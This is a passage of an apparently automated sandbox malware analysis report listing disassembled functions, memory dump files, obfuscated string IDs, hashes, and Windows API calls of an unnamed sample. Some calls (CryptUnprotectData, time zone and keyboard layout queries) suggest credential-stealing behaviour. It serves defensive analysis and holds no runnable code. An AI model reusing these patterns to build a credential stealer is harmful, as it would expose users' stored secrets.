                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                • String ID: /
                                • API String ID: 3090951853-4001269591
                                • Opcode ID: 719f760f3b98ca167793c911dab7dc2e37790f3dfaef026d83e43feff7800859
                                • Instruction ID: f5124fcea9b4a87957a9cee4c7a6859cf569302ebe461be9f2ec464d244cbf1d
                                • Opcode Fuzzy Hash: 719f760f3b98ca167793c911dab7dc2e37790f3dfaef026d83e43feff7800859
                                • Instruction Fuzzy Hash: CDB1FD71900219CFC715CF14C948B66B7F1FB44329F29C1AAD6089B3A6D7BA9D82CF94
                                Function 0088BF4F Relevance: 9.1, Strings: 6, Instructions: 1605COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: -=u$2Z}$2my$Fmo$Fmo$r:5
                                • API String ID: 0-2489032309
                                • Opcode ID: c10b2218bce4a22b2ed16f48a9da5408ffd63431651fc6ce78460e2e372b9632
                                • Instruction ID: ef052ede2e9605400fc10cb87e24edc6aff54df3f33183951e2ed43b8a21c6fd
                                • Opcode Fuzzy Hash: c10b2218bce4a22b2ed16f48a9da5408ffd63431651fc6ce78460e2e372b9632
                                • Instruction Fuzzy Hash: 20B2E2F260C2049FE304AF29EC8567AFBE9EF94320F16893DE6C4C7744EA3558458697
                                Function 008A1B61 Relevance: 9.1, Strings: 6, Instructions: 1599COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: *{$:yv$=y%$G?_y$\p,8$mM)
                                • API String ID: 0-3631182876
                                • Opcode ID: 167a452013f1dd63c998730721350d7018c3b3ae736e827d7c65588a458874fb
                                • Instruction ID: 81c606e4b4502c2c59b17bddf9841701a0dedf545448769588eb3fda9d66886b
                                • Opcode Fuzzy Hash: 167a452013f1dd63c998730721350d7018c3b3ae736e827d7c65588a458874fb
                                • Instruction Fuzzy Hash: 12B217F3A0C2049FE3086E2DEC8567ABBE5EF94720F16493DE6C5C7744EA3598018697
                                Function 004F2C10 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46memorytimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 004F2C42
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004F2C49
                                • GetTimeZoneInformation.KERNEL32(?), ref: 004F2C58
                                • wsprintfA.USER32 ref: 004F2C83
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
                                • String ID: wwww
                                • API String ID: 3317088062-671953474
                                • Opcode ID: 7c0023930384fbf5fb01249b9b94520b99325faecdb3be47e753f3db2852bac4
                                • Instruction ID: 570ef9583bf8d9b73e00871b47d921d2c7d9c7fb9e1b0686627f713b232211a6
                                • Opcode Fuzzy Hash: 7c0023930384fbf5fb01249b9b94520b99325faecdb3be47e753f3db2852bac4
                                • Instruction Fuzzy Hash: 90012B71A40604EBDB188F58DC49F6EBB6DEB84721F00832AFA15D77C0DB7819008AD5
                                Function 0088A387 Relevance: 7.9, Strings: 5, Instructions: 1672COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: aif$z9{z$z}$M[$cRW
                                • API String ID: 0-1756225985
                                • Opcode ID: 9f921f8cc126c0d9842d8a27abf5ee689a6bc8b6b828757f8a839693c9918258
                                • Instruction ID: 43558970e0cbe554e5cdb30c9ac31d072afab7bef62d107fe0958d154c020602
                                • Opcode Fuzzy Hash: 9f921f8cc126c0d9842d8a27abf5ee689a6bc8b6b828757f8a839693c9918258
                                • Instruction Fuzzy Hash: C9B207F3A0C204AFE3046E2DEC8567AB7E9EF94720F1A493DE6C5C3744EA3558058697
                                Function 0088DAAB Relevance: 7.8, Strings: 5, Instructions: 1600COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 5>]_$9Xg>$:}os$pbNl$zg#m
                                • API String ID: 0-4235228168
                                • Opcode ID: f011803f441396f8936521a7ec30c64a1955b2eb077079e829cc1ff31533bb96
                                • Instruction ID: ad699a78f77498cbbe049eb6817a95c1d1f6f688505658e538e9617eba920c81
                                • Opcode Fuzzy Hash: f011803f441396f8936521a7ec30c64a1955b2eb077079e829cc1ff31533bb96
                                • Instruction Fuzzy Hash: DFB207F39082049FE304AE2DDC8577ABBE6EF94720F1A863DEAC4C7744E63558058697
                                Function 008995BE Relevance: 7.8, Strings: 5, Instructions: 1531COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 2Oo$HDg$L=y$L=y$k{
                                • API String ID: 0-3867656540
                                • Opcode ID: 09e83ddc02b9ac602abba94af1844f0b4c0e255d624cd604686c7e8dad7e6c74
                                • Instruction ID: 396d412f306db0068234e304920c35f9ff38a1538cbc6806276b810714157c24
                                • Opcode Fuzzy Hash: 09e83ddc02b9ac602abba94af1844f0b4c0e255d624cd604686c7e8dad7e6c74
                                • Instruction Fuzzy Hash: D0B2C5F3A0C210AFE704AE19DC4567AFBE5EF94720F16892DEAC4C3744E63598148B97
                                Function 0088F4D6 Relevance: 7.8, Strings: 5, Instructions: 1510COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &e=$1MGQ$Q{$ax+?$gJ*
                                • API String ID: 0-3576996562
                                • Opcode ID: ad08f4da780cafb991b53b92995309286219609b1836b70143dd5958aa7d5f79
                                • Instruction ID: 442eccad3d03257aa0e30e97bfd88ae5d4d96d03d74d2960f2b805630a4b1f98
                                • Opcode Fuzzy Hash: ad08f4da780cafb991b53b92995309286219609b1836b70143dd5958aa7d5f79
                                • Instruction Fuzzy Hash: 8BA2D1F3A0C2149FE304AE29EC8567ABBE5EB94320F1A493DEAC4C7344E63558458797
                                Function 004D7750 Relevance: 7.6, APIs: 5, Instructions: 52memoryencryptionCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000008,00000400), ref: 004D775E
                                • RtlAllocateHeap.NTDLL(00000000), ref: 004D7765
                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 004D778D
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000400,00000000,00000000), ref: 004D77AD
                                • LocalFree.KERNEL32(?), ref: 004D77B7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                • String ID:
                                • API String ID: 2609814428-0
                                • Opcode ID: 618f2d34996d8db37f1e6459e013ca640fc53f9db7df5dadabcd7399c14f2400
                                • Instruction ID: bc9b01a00fbc61fa1f4eef89165dd5f102e098a62e3fe08d37180bc7713ebf20
                                • Opcode Fuzzy Hash: 618f2d34996d8db37f1e6459e013ca640fc53f9db7df5dadabcd7399c14f2400
                                • Instruction Fuzzy Hash: 99012575B40309BBEB10DB94DC4AFAA7B78EB44B11F108155FB05EB2C0DAB4A900C794
                                Function 0089B2C1 Relevance: 7.6, Strings: 5, Instructions: 1301COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: J3g$7;k$Aq{?$BaU$T175
                                • API String ID: 0-982664591
                                • Opcode ID: fb0f063a7b5ec97b1dd156c5086b6c39e83aafc3c5c3aa65cec998fe0f3af7b7
                                • Instruction ID: 7fe083c916f1152ccc3df91b06f76fee51f020b67db8c56bfaebff8bda13bb61
                                • Opcode Fuzzy Hash: fb0f063a7b5ec97b1dd156c5086b6c39e83aafc3c5c3aa65cec998fe0f3af7b7
                                • Instruction Fuzzy Hash: 5192E5F36082049FE304BE2DEC8567ABBE5EF94720F1A493DEAC4C3744E63598158697
                                Function 008A009A Relevance: 6.7, Strings: 4, Instructions: 1674COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Itru$_kt$b#5$p|
                                • API String ID: 0-4270282277
                                • Opcode ID: be93d3d22b01961dc410479d49407e0b627628887611466b7eed74ba4f738e8e
                                • Instruction ID: dad185a7c3076c36c3866b94b8bafa4cfb6a38d3c5ebc7d86758bd8daa491084
                                • Opcode Fuzzy Hash: be93d3d22b01961dc410479d49407e0b627628887611466b7eed74ba4f738e8e
                                • Instruction Fuzzy Hash: 1EB25BF3A0C2009FE7046E2DEC8567ABBEAEFD4720F1A853DE6C5C3744E93558058696
                                Function 00895F76 Relevance: 6.6, Strings: 4, Instructions: 1627COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
